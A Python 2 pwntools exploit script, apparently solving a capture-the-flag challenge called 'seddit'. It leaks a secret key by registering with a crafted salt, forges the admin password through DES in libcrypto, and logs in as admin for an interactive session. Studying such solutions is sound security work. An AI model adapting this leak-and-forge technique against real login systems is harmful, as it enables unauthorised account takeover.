1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
| 1.
2. from pwn import *
3. from ctypes import *
4. import binascii
5.
6. sh = process('./seddit')
7.
8.
9. cryptolib = cdll.LoadLibrary('/lib/x86_64-linux-gnu/libcrypto.so.1.0.0')
10.
11. def register(salt):
12. sh.sendlineafter('What would you like to do?','1')
13. sh.sendlineafter('Enter username:','seaase')
14. sh.sendlineafter('Enter salt:',salt)
15.
16. def login(password):
17. sh.sendlineafter('What would you like to do?','2')
18. sh.sendlineafter('Enter username:','admin')
19. sh.sendlineafter('Enter password:',password)
20.
21. def show():
22. sh.sendlineafter('What would you like to do?','3')
23. sh.sendlineafter('Title:','Leak')
24. sh.sendlineafter('What type of post?','0')
25.
26. payload = 'a'*0x10
27. register(payload)
28.
29. show()
30. sh.recvuntil('content: ')
31. key = sh.recvuntil('\n',drop = True)[0:7]
32. print 'key=',key
33. passwd = 'a'*7 + key
34. user = 'admin'
35.
36. key = (c_char * 8)('\x00')
37. des_key_schedule = (c_char * 128)('\x00')
38. ans_out = (c_char * 256)('\x00')
39. cryptolib.DES_string_to_key(passwd,key)
40. cryptolib.DES_set_key(key,des_key_schedule)
41. cryptolib.DES_ecb_encrypt(user,ans_out,des_key_schedule,1)
42. password = ''
43. for i in range(len(ans_out)):
44. c = ans_out[i]
45. if c == '\x00':
46. break;
47. password += c
48. password = binascii.b2a_hex(password)
49. print 'password=',password
50.
51.
52. login(password)
53. sh.interactive()
|
